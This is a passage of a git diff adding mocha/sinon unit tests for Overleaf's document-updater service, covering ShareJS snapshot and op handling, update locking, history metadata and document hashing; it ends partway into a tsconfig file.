+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/ShareJsDB.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') + +describe('ShareJsDB', function () { + beforeEach(function () { + this.doc_id = 'document-id' + this.project_id = 'project-id' + this.doc_key = `${this.project_id}:${this.doc_id}` + this.callback = sinon.stub() + this.ShareJsDB = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = { + getPreviousDocOps: sinon.stub(), + }), + './Errors': Errors, + '@overleaf/metrics': { + inc: sinon.stub(), + histogram: sinon.stub(), + Timer: class Timer { + done() {} + }, + }, + }, + }) + + this.version = 42 + this.lines = ['one', 'two', 'three'] + return (this.db = new this.ShareJsDB( + this.project_id, + this.doc_id, + this.lines, + this.version + )) + }) + + describe('getSnapshot', function () { + describe('successfully', function () { + beforeEach(function () { + return this.db.getSnapshot(this.doc_key, this.callback) + }) + + it('should return the doc lines', function () { + return this.callback.args[0][1].snapshot.should.equal( + this.lines.join('\n') + ) + }) + + it('should return the doc version', function () { + return this.callback.args[0][1].v.should.equal(this.version) + }) + + return it('should return the type as text', function () { + return this.callback.args[0][1].type.should.equal('text') + }) + }) + + return describe('when the key does not match', function () { + beforeEach(function () { + return this.db.getSnapshot('bad:key', this.callback) + }) + + return it('should return the callback with a NotFoundError', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + }) + }) + + describe('getOps', function () { + describe('with start == end', function () { + beforeEach(function () { + this.start = this.end = 42 + return this.db.getOps(this.doc_key, this.start, this.end, this.callback) + }) + + it('should not talk to redis', function () { + this.RedisManager.getPreviousDocOps.should.not.have.been.called + }) + + return it('should return an empty array', function () { + return this.callback.calledWith(null, []).should.equal(true) + }) + }) + + describe('with start == redis-version and end unset', function () { + beforeEach(function () { + const start = this.version + const end = null + this.db.getOps(this.doc_key, start, end, this.callback) + }) + + it('should not talk to redis', function () { + this.RedisManager.getPreviousDocOps.should.not.have.been.called + }) + + it('should return an empty array', function () { + this.callback.should.have.been.calledWith(null, []) + }) + }) + + describe('with a non empty range', function () { + beforeEach(function () { + this.start = 35 + this.end = 42 + this.ops = new Array(this.end - this.start) + this.RedisManager.getPreviousDocOps = sinon + .stub() + .callsArgWith(3, null, this.ops) + return this.db.getOps(this.doc_key, this.start, this.end, this.callback) + }) + + it('should get the range from redis', function () { + return this.RedisManager.getPreviousDocOps + .calledWith(this.doc_id, this.start, this.end - 1) + .should.equal(true) + }) + + return it('should 
return the ops', function () { + return this.callback.calledWith(null, this.ops).should.equal(true) + }) + }) + + return describe('with no specified end', function () { + beforeEach(function () { + this.start = 35 + this.end = null + this.ops = [] + this.RedisManager.getPreviousDocOps = sinon + .stub() + .callsArgWith(3, null, this.ops) + return this.db.getOps(this.doc_key, this.start, this.end, this.callback) + }) + + return it('should get until the end of the list', function () { + return this.RedisManager.getPreviousDocOps + .calledWith(this.doc_id, this.start, -1) + .should.equal(true) + }) + }) + }) + + return describe('writeOps', function () { + return describe('writing an op', function () { + beforeEach(function () { + this.opData = { + op: { p: 20, t: 'foo' }, + meta: { source: 'bar' }, + v: this.version, + } + return this.db.writeOp(this.doc_key, this.opData, this.callback) + }) + + it('should write into appliedOps', function () { + return expect(this.db.appliedOps[this.doc_key]).to.deep.equal([ + this.opData, + ]) + }) + + return it('should call the callback without an error', function () { + this.callback.called.should.equal(true) + return (this.callback.args[0][0] != null).should.equal(false) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ShareJsUpdateManager/ShareJsUpdateManagerTests.js b/services/document-updater/test/unit/js/ShareJsUpdateManager/ShareJsUpdateManagerTests.js new file mode 100644 index 0000000..e699439 --- /dev/null +++ b/services/document-updater/test/unit/js/ShareJsUpdateManager/ShareJsUpdateManagerTests.js @@ -0,0 +1,237 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ShareJsUpdateManager.js' +const SandboxedModule = require('sandboxed-module') +const crypto = require('node:crypto') + +describe('ShareJsUpdateManager', function () { + beforeEach(function () { + let Model + this.project_id = 'project-id-123' + this.doc_id = 'document-id-123' + this.callback = sinon.stub() + return (this.ShareJsUpdateManager = SandboxedModule.require(modulePath, { + requires: { + './sharejs/server/model': (Model = class Model { + constructor(db) { + this.db = db + } + }), + './ShareJsDB': (this.ShareJsDB = { mockDB: true }), + '@overleaf/redis-wrapper': { + createClient: () => { + return (this.rclient = { auth() {} }) + }, + }, + './RealTimeRedisManager': (this.RealTimeRedisManager = { + sendCanaryAppliedOp: sinon.stub(), + }), + './Metrics': (this.metrics = { inc: sinon.stub() }), + }, + globals: { + clearTimeout: (this.clearTimeout = sinon.stub()), + }, + })) + }) + + describe('applyUpdate', function () { + beforeEach(function () { + this.lines = ['one', 'two'] + this.version = 34 + this.updatedDocLines = ['onefoo', 'two'] + const content = this.updatedDocLines.join('\n') + this.hash = crypto + .createHash('sha1') + .update('blob ' + content.length + '\x00') + .update(content, 'utf8') + .digest('hex') + this.update = { p: 4, t: 'foo', v: this.version, hash: this.hash } + this.model = { + applyOp: sinon.stub().callsArg(2), + getSnapshot: sinon.stub(), + db: { + appliedOps: {}, + }, + } + this.ShareJsUpdateManager.getNewShareJsModel = sinon + .stub() + 
.returns(this.model) + this.ShareJsUpdateManager._listenForOps = sinon.stub() + return (this.ShareJsUpdateManager.removeDocFromCache = sinon + .stub() + .callsArg(1)) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.model.getSnapshot.callsArgWith(1, null, { + snapshot: this.updatedDocLines.join('\n'), + v: this.version, + }) + this.model.db.appliedOps[`${this.project_id}:${this.doc_id}`] = + this.appliedOps = ['mock-ops'] + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version, appliedOps) => { + this.callback(err, docLines, version, appliedOps) + return done() + } + ) + }) + + it('should create a new ShareJs model', function () { + return this.ShareJsUpdateManager.getNewShareJsModel + .calledWith(this.project_id, this.doc_id, this.lines, this.version) + .should.equal(true) + }) + + it('should listen for ops on the model', function () { + return this.ShareJsUpdateManager._listenForOps + .calledWith(this.model) + .should.equal(true) + }) + + it('should send the update to ShareJs', function () { + return this.model.applyOp + .calledWith(`${this.project_id}:${this.doc_id}`, this.update) + .should.equal(true) + }) + + it('should get the updated doc lines', function () { + return this.model.getSnapshot + .calledWith(`${this.project_id}:${this.doc_id}`) + .should.equal(true) + }) + + return it('should return the updated doc lines, version and ops', function () { + return this.callback + .calledWith(null, this.updatedDocLines, this.version, this.appliedOps) + .should.equal(true) + }) + }) + + describe('when applyOp fails', function () { + beforeEach(function (done) { + this.error = new Error('Something went wrong') + this.model.applyOp = sinon.stub().callsArgWith(2, this.error) + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version) => { + this.callback(err, docLines, version) + return done() + } + ) + }) + + return it('should call the callback with the error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when getSnapshot fails', function () { + beforeEach(function (done) { + this.error = new Error('Something went wrong') + this.model.getSnapshot.callsArgWith(1, this.error) + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version) => { + this.callback(err, docLines, version) + return done() + } + ) + }) + + return it('should call the callback with the error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('with an invalid hash', function () { + beforeEach(function (done) { + this.error = new Error('invalid hash') + this.model.getSnapshot.callsArgWith(1, null, { + snapshot: 'unexpected content', + v: this.version, + }) + this.model.db.appliedOps[`${this.project_id}:${this.doc_id}`] = + this.appliedOps = ['mock-ops'] + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version, appliedOps) => { + this.callback(err, docLines, version, appliedOps) + return done() + } + ) + }) + + return it('should call the callback with the error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + return 
describe('_listenForOps', function () { + beforeEach(function () { + this.model = { + on: (event, callback) => { + return (this.callback = callback) + }, + } + sinon.spy(this.model, 'on') + return this.ShareJsUpdateManager._listenForOps(this.model) + }) + + it('should listen to the model for updates', function () { + return this.model.on.calledWith('applyOp').should.equal(true) + }) + + return describe('the callback', function () { + beforeEach(function () { + this.opData = { + op: { t: 'foo', p: 1 }, + meta: { source: 'bar' }, + } + this.RealTimeRedisManager.sendData = sinon.stub() + return this.callback(`${this.project_id}:${this.doc_id}`, this.opData) + }) + + return it('should publish the op to redis', function () { + return this.RealTimeRedisManager.sendData + .calledWith({ + project_id: this.project_id, + doc_id: this.doc_id, + op: this.opData, + }) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/UpdateManager/UpdateManagerTests.js b/services/document-updater/test/unit/js/UpdateManager/UpdateManagerTests.js new file mode 100644 index 0000000..dba6645 --- /dev/null +++ b/services/document-updater/test/unit/js/UpdateManager/UpdateManagerTests.js @@ -0,0 +1,836 @@ +const { createHash } = require('node:crypto') +const sinon = require('sinon') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') + +const MODULE_PATH = '../../../../app/js/UpdateManager.js' + +describe('UpdateManager', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.doc_id = 'document-id-123' + this.lockValue = 'mock-lock-value' + this.pathname = '/a/b/c.tex' + + this.Metrics = { + inc: sinon.stub(), + Timer: class Timer {}, + } + this.Metrics.Timer.prototype.done = sinon.stub() + + this.Profiler = class Profiler {} + this.Profiler.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.Profiler.prototype.end = sinon.stub() + + this.LockManager = { + promises: { + tryLock: sinon.stub().resolves(this.lockValue), + getLock: sinon.stub().resolves(this.lockValue), + releaseLock: sinon.stub().resolves(), + }, + } + + this.RedisManager = { + promises: { + setDocument: sinon.stub().resolves(), + updateDocument: sinon.stub(), + }, + } + + this.RealTimeRedisManager = { + sendData: sinon.stub(), + promises: { + getUpdatesLength: sinon.stub(), + getPendingUpdatesForDoc: sinon.stub(), + }, + } + + this.ShareJsUpdateManager = { + promises: { + applyUpdate: sinon.stub(), + }, + } + + this.HistoryManager = { + recordAndFlushHistoryOps: sinon.stub(), + } + + this.Settings = {} + + this.DocumentManager = { + promises: { + getDoc: sinon.stub(), + }, + } + + this.RangesManager = { + applyUpdate: sinon.stub(), + } + + this.SnapshotManager = { + promises: { + recordSnapshot: sinon.stub().resolves(), + }, + } + + this.ProjectHistoryRedisManager = { + promises: { + queueOps: sinon + .stub() + .callsFake(async (projectId, ...ops) => ops.length), + }, + } + + this.UpdateManager = SandboxedModule.require(MODULE_PATH, { + requires: { + './LockManager': this.LockManager, + './RedisManager': this.RedisManager, + './RealTimeRedisManager': this.RealTimeRedisManager, + './ShareJsUpdateManager': this.ShareJsUpdateManager, + './HistoryManager': this.HistoryManager, + './Metrics': this.Metrics, + '@overleaf/settings': this.Settings, + './DocumentManager': this.DocumentManager, + './RangesManager': this.RangesManager, + './SnapshotManager': this.SnapshotManager, + './Profiler': 
this.Profiler, + './ProjectHistoryRedisManager': this.ProjectHistoryRedisManager, + }, + }) + }) + + describe('processOutstandingUpdates', function () { + beforeEach(async function () { + this.UpdateManager.promises.fetchAndApplyUpdates = sinon.stub().resolves() + await this.UpdateManager.promises.processOutstandingUpdates( + this.project_id, + this.doc_id + ) + }) + + it('should apply the updates', function () { + this.UpdateManager.promises.fetchAndApplyUpdates + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('processOutstandingUpdatesWithLock', function () { + describe('when the lock is free', function () { + beforeEach(function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock = sinon + .stub() + .resolves() + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + }) + + describe('successfully', function () { + beforeEach(async function () { + await this.UpdateManager.promises.processOutstandingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should acquire the lock', function () { + this.LockManager.promises.tryLock + .calledWith(this.doc_id) + .should.equal(true) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + + it('should process the outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdates + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should do everything with the lock acquired', function () { + this.UpdateManager.promises.processOutstandingUpdates + .calledAfter(this.LockManager.promises.tryLock) + .should.equal(true) + this.UpdateManager.promises.processOutstandingUpdates + .calledBefore(this.LockManager.promises.releaseLock) + .should.equal(true) + }) + + it('should continue processing new updates that may have come in', function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when processOutstandingUpdates returns an error', function () { + beforeEach(async function () { + this.error = new Error('Something went wrong') + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .rejects(this.error) + await expect( + this.UpdateManager.promises.processOutstandingUpdatesWithLock( + this.project_id, + this.doc_id + ) + ).to.be.rejectedWith(this.error) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + }) + + describe('when the lock is taken', function () { + beforeEach(async function () { + this.LockManager.promises.tryLock.resolves(null) + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + await this.UpdateManager.promises.processOutstandingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should not process the updates', function () { + this.UpdateManager.promises.processOutstandingUpdates.called.should.equal( + false + ) + }) + }) + }) + + describe('continueProcessingUpdatesWithLock', function () { + describe('when there are outstanding updates', function () { + beforeEach(async function () { + this.RealTimeRedisManager.promises.getUpdatesLength.resolves(3) + 
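      // three updates are still queued in Redis; a non-zero queue length is
+        // expected to trigger another locked processing pass (asserted below)
+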
this.UpdateManager.promises.processOutstandingUpdatesWithLock = sinon + .stub() + .resolves() + await this.UpdateManager.promises.continueProcessingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should process the outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when there are no outstanding updates', function () { + beforeEach(async function () { + this.RealTimeRedisManager.promises.getUpdatesLength.resolves(0) + this.UpdateManager.promises.processOutstandingUpdatesWithLock = sinon + .stub() + .resolves() + await this.UpdateManager.promises.continueProcessingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should not try to process the outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdatesWithLock.called.should.equal( + false + ) + }) + }) + }) + + describe('fetchAndApplyUpdates', function () { + describe('with updates', function () { + beforeEach(async function () { + this.updates = [{ p: 1, t: 'foo' }] + this.updatedDocLines = ['updated', 'lines'] + this.version = 34 + this.RealTimeRedisManager.promises.getPendingUpdatesForDoc.resolves( + this.updates + ) + this.UpdateManager.promises.applyUpdate = sinon.stub().resolves() + await this.UpdateManager.promises.fetchAndApplyUpdates( + this.project_id, + this.doc_id + ) + }) + + it('should get the pending updates', function () { + this.RealTimeRedisManager.promises.getPendingUpdatesForDoc + .calledWith(this.doc_id) + .should.equal(true) + }) + + it('should apply the updates', function () { + this.updates.map(update => + this.UpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, update) + .should.equal(true) + ) + }) + }) + + describe('when there are no updates', function () { + beforeEach(async function () { + this.updates = [] + this.RealTimeRedisManager.promises.getPendingUpdatesForDoc.resolves( + this.updates + ) + this.UpdateManager.promises.applyUpdate = sinon.stub().resolves() + await this.UpdateManager.promises.fetchAndApplyUpdates( + this.project_id, + this.doc_id + ) + }) + + it('should not call applyUpdate', function () { + this.UpdateManager.promises.applyUpdate.called.should.equal(false) + }) + }) + }) + + describe('applyUpdate', function () { + beforeEach(function () { + this.updateMeta = { user_id: 'last-author-fake-id' } + this.update = { op: [{ p: 42, i: 'foo' }], meta: this.updateMeta } + this.updatedDocLines = ['updated', 'lines'] + this.version = 34 + this.lines = ['original', 'lines'] + this.ranges = { entries: 'mock', comments: 'mock' } + this.updated_ranges = { entries: 'updated', comments: 'updated' } + this.appliedOps = [ + { v: 42, op: 'mock-op-42' }, + { v: 45, op: 'mock-op-45' }, + ] + this.historyUpdates = [ + 'history-update-1', + 'history-update-2', + 'history-update-3', + ] + this.project_ops_length = 123 + this.DocumentManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: false, + }) + this.RangesManager.applyUpdate.returns({ + newRanges: this.updated_ranges, + rangesWereCollapsed: false, + historyUpdates: this.historyUpdates, + }) + this.ShareJsUpdateManager.promises.applyUpdate = sinon.stub().resolves({ + updatedDocLines: this.updatedDocLines, + version: this.version, + appliedOps: this.appliedOps, + }) + 
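    // persistence and metadata rewriting are stubbed out here; the tests
+      // below only assert how these collaborators are invoked
+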
this.RedisManager.promises.updateDocument.resolves() + this.UpdateManager.promises._adjustHistoryUpdatesMetadata = sinon.stub() + }) + + describe('normally', function () { + beforeEach(async function () { + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should apply the updates via ShareJS', function () { + this.ShareJsUpdateManager.promises.applyUpdate + .calledWith( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version + ) + .should.equal(true) + }) + + it('should update the ranges', function () { + this.RangesManager.applyUpdate + .calledWith( + this.project_id, + this.doc_id, + this.ranges, + this.appliedOps, + this.updatedDocLines + ) + .should.equal(true) + }) + + it('should save the document', function () { + this.RedisManager.promises.updateDocument + .calledWith( + this.project_id, + this.doc_id, + this.updatedDocLines, + this.version, + this.appliedOps, + this.updated_ranges, + this.updateMeta + ) + .should.equal(true) + }) + + it('should add metadata to the ops', function () { + this.UpdateManager.promises._adjustHistoryUpdatesMetadata.should.have.been.calledWith( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + this.lines, + this.ranges, + this.updatedDocLines + ) + }) + + it('should push the applied ops into the history queue', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWith( + this.project_id, + ...this.historyUpdates.map(op => JSON.stringify(op)) + ) + this.HistoryManager.recordAndFlushHistoryOps.should.have.been.calledWith( + this.project_id, + this.historyUpdates, + this.historyUpdates.length + ) + }) + }) + + describe('with UTF-16 surrogate pairs in the update', function () { + beforeEach(async function () { + this.update = { op: [{ p: 42, i: '\uD835\uDC00' }] } + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should apply the update but with surrogate pairs removed', function () { + this.ShareJsUpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, this.update) + .should.equal(true) + + // \uFFFD is 'replacement character' + this.update.op[0].i.should.equal('\uFFFD\uFFFD') + }) + }) + + describe('with an error', function () { + beforeEach(async function () { + this.error = new Error('something went wrong') + this.ShareJsUpdateManager.promises.applyUpdate.rejects(this.error) + await expect( + this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + ).to.be.rejectedWith(this.error) + }) + + it('should call RealTimeRedisManager.sendData with the error', function () { + this.RealTimeRedisManager.sendData + .calledWith({ + project_id: this.project_id, + doc_id: this.doc_id, + error: this.error.message, + }) + .should.equal(true) + }) + }) + + describe('when ranges get collapsed', function () { + beforeEach(async function () { + this.RangesManager.applyUpdate.returns({ + newRanges: this.updated_ranges, + rangesWereCollapsed: true, + historyUpdates: this.historyUpdates, + }) + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should increment the doc-snapshot metric', function () { + this.Metrics.inc.calledWith('doc-snapshot').should.equal(true) + }) + + it('should call SnapshotManager.recordSnapshot', function () { + this.SnapshotManager.promises.recordSnapshot + .calledWith( + this.project_id, + this.doc_id, + this.version, + this.pathname, 
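+            // note: these are the pre-update lines and ranges from getDoc,
+            // not the post-update values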
+ this.lines, + this.ranges + ) + .should.equal(true) + }) + }) + + describe('when history ranges are supported', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: true, + }) + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should push the history updates into the history queue', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWith( + this.project_id, + ...this.historyUpdates.map(op => JSON.stringify(op)) + ) + this.HistoryManager.recordAndFlushHistoryOps.should.have.been.calledWith( + this.project_id, + this.historyUpdates, + this.historyUpdates.length + ) + }) + }) + }) + + describe('_adjustHistoryUpdatesMetadata', function () { + beforeEach(function () { + this.lines = ['some', 'test', 'data'] + this.updatedDocLines = ['after', 'updates'] + this.historyUpdates = [ + { + v: 42, + op: [ + { i: 'bing', p: 12, trackedDeleteRejection: true }, + { i: 'foo', p: 4 }, + { i: 'bar', p: 6 }, + ], + }, + { + v: 45, + op: [ + { d: 'qux', p: 4 }, + { i: 'bazbaz', p: 14 }, + { + d: 'bong', + p: 28, + trackedChanges: [{ type: 'insert', offset: 0, length: 4 }], + }, + ], + meta: { + tc: 'tracking-info', + }, + }, + { + v: 47, + op: [{ d: 'so', p: 0 }], + }, + { v: 49, op: [{ i: 'penguin', p: 18 }] }, + ] + this.ranges = { + changes: [ + { op: { d: 'bingbong', p: 12 } }, + { op: { i: 'test', p: 5 } }, + ], + } + }) + + it('should add projectHistoryId, pathname and doc_length metadata to the ops', function () { + this.UpdateManager._adjustHistoryUpdatesMetadata( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + this.lines, + this.updatedDocLines, + this.ranges, + false + ) + this.historyUpdates.should.deep.equal([ + { + projectHistoryId: this.projectHistoryId, + v: 42, + op: [ + { i: 'bing', p: 12, trackedDeleteRejection: true }, + { i: 'foo', p: 4 }, + { i: 'bar', p: 6 }, + ], + meta: { + pathname: this.pathname, + doc_length: 14, + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 45, + op: [ + { d: 'qux', p: 4 }, + { i: 'bazbaz', p: 14 }, + { + d: 'bong', + p: 28, + trackedChanges: [{ type: 'insert', offset: 0, length: 4 }], + }, + ], + meta: { + pathname: this.pathname, + doc_length: 24, // 14 + 'bing' + 'foo' + 'bar' + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 47, + op: [{ d: 'so', p: 0 }], + meta: { + pathname: this.pathname, + doc_length: 23, // 24 - 'qux' + 'bazbaz' - 'bong' + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 49, + op: [{ i: 'penguin', p: 18 }], + meta: { + pathname: this.pathname, + doc_length: 21, // 23 - 'so' + }, + }, + ]) + }) + + it('should add additional metadata when ranges support is enabled', function () { + this.UpdateManager._adjustHistoryUpdatesMetadata( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + this.lines, + this.ranges, + this.updatedDocLines, + true + ) + this.historyUpdates.should.deep.equal([ + { + projectHistoryId: this.projectHistoryId, + v: 42, + op: [ + { i: 'bing', p: 12, trackedDeleteRejection: true }, + { i: 'foo', p: 4 }, + { i: 'bar', p: 6 }, + ], + meta: { + pathname: this.pathname, + doc_length: 14, + history_doc_length: 22, + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 45, + op: [ + { d: 'qux', p: 4 }, + { i: 'bazbaz', p: 14 }, + { + d: 'bong', + 
p: 28, + trackedChanges: [{ type: 'insert', offset: 0, length: 4 }], + }, + ], + meta: { + pathname: this.pathname, + doc_length: 24, // 14 + 'bing' + 'foo' + 'bar' + history_doc_length: 28, // 22 + 'foo' + 'bar' + tc: 'tracking-info', + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 47, + op: [{ d: 'so', p: 0 }], + meta: { + pathname: this.pathname, + doc_length: 23, // 24 - 'qux' + 'bazbaz' - 'bong' + history_doc_length: 30, // 28 - 'bong' + 'bazbaz' + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 49, + op: [{ i: 'penguin', p: 18 }], + meta: { + pathname: this.pathname, + doc_length: 21, // 23 - 'so' + doc_hash: stringHash(this.updatedDocLines.join('\n')), + history_doc_length: 28, // 30 - 'so' + }, + }, + ]) + }) + + it('should calculate the right doc length for an empty document', function () { + this.historyUpdates = [{ v: 42, op: [{ i: 'foobar', p: 0 }] }] + this.UpdateManager._adjustHistoryUpdatesMetadata( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + [], + {}, + ['foobar'], + false + ) + this.historyUpdates.should.deep.equal([ + { + projectHistoryId: this.projectHistoryId, + v: 42, + op: [{ i: 'foobar', p: 0 }], + meta: { + pathname: this.pathname, + doc_length: 0, + }, + }, + ]) + }) + }) + + describe('lockUpdatesAndDo', function () { + beforeEach(function () { + this.methodResult = 'method result' + this.method = sinon.stub().resolves(this.methodResult) + this.arg1 = 'argument 1' + }) + + describe('successfully', function () { + beforeEach(async function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock = sinon + .stub() + .resolves() + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + this.response = await this.UpdateManager.promises.lockUpdatesAndDo( + this.method, + this.project_id, + this.doc_id, + this.arg1 + ) + }) + + it('should lock the doc', function () { + this.LockManager.promises.getLock + .calledWith(this.doc_id) + .should.equal(true) + }) + + it('should process any outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdates.should.have.been.calledWith( + this.project_id, + this.doc_id + ) + }) + + it('should call the method', function () { + this.method + .calledWith(this.project_id, this.doc_id, this.arg1) + .should.equal(true) + }) + + it('should return the method response arguments', function () { + expect(this.response).to.equal(this.methodResult) + }) + + it('should release the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + + it('should continue processing updates', function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when processOutstandingUpdates returns an error', function () { + beforeEach(async function () { + this.error = new Error('Something went wrong') + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .rejects(this.error) + await expect( + this.UpdateManager.promises.lockUpdatesAndDo( + this.method, + this.project_id, + this.doc_id, + this.arg1 + ) + ).to.be.rejectedWith(this.error) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + + describe('when the method returns an error', function () { + beforeEach(async function () { + this.error = new Error('something went wrong') + 
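        // the wrapped method itself rejects this time; the tests below check
+        // that the lock is still released despite the failure
+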
this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + this.method = sinon.stub().rejects(this.error) + await expect( + this.UpdateManager.promises.lockUpdatesAndDo( + this.method, + this.project_id, + this.doc_id, + this.arg1 + ) + ).to.be.rejectedWith(this.error) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + }) +}) + +function stringHash(s) { + const hash = createHash('sha1') + hash.update(s) + return hash.digest('hex') +} diff --git a/services/document-updater/test/unit/js/UtilsTests.js b/services/document-updater/test/unit/js/UtilsTests.js new file mode 100644 index 0000000..5d0f03c --- /dev/null +++ b/services/document-updater/test/unit/js/UtilsTests.js @@ -0,0 +1,54 @@ +// @ts-check + +const { createHash } = require('node:crypto') +const { expect } = require('chai') +const Utils = require('../../../app/js/Utils') + +describe('Utils', function () { + describe('addTrackedDeletesToContent', function () { + it("doesn't modify text without tracked deletes", function () { + const content = 'the quick brown fox' + const trackedChanges = [] + const result = Utils.addTrackedDeletesToContent(content, trackedChanges) + expect(result).to.equal(content) + }) + + it('adds tracked deletes to text but skips tracked inserts', function () { + const content = 'the brown fox jumps over the dog' + const metadata = { user_id: 'user1', ts: new Date().toString() } + const trackedChanges = [ + { id: 'tc1', op: { d: 'quick ', p: 4 }, metadata }, + { id: 'tc2', op: { i: 'brown ', p: 5 }, metadata }, + { id: 'tc3', op: { d: 'lazy ', p: 29 }, metadata }, + ] + const result = Utils.addTrackedDeletesToContent(content, trackedChanges) + expect(result).to.equal('the quick brown fox jumps over the lazy dog') + }) + }) + + describe('computeDocHash', function () { + it('computes the hash for an empty doc', function () { + const actual = Utils.computeDocHash([]) + const expected = stringHash('') + expect(actual).to.equal(expected) + }) + + it('computes the hash for a single-line doc', function () { + const actual = Utils.computeDocHash(['hello']) + const expected = stringHash('hello') + expect(actual).to.equal(expected) + }) + + it('computes the hash for a multiline doc', function () { + const actual = Utils.computeDocHash(['hello', 'there', 'world']) + const expected = stringHash('hello\nthere\nworld') + expect(actual).to.equal(expected) + }) + }) +}) + +function stringHash(s) { + const hash = createHash('sha1') + hash.update(s) + return hash.digest('hex') +} diff --git a/services/document-updater/tsconfig.json b/services/document-updater/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/document-updater/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", 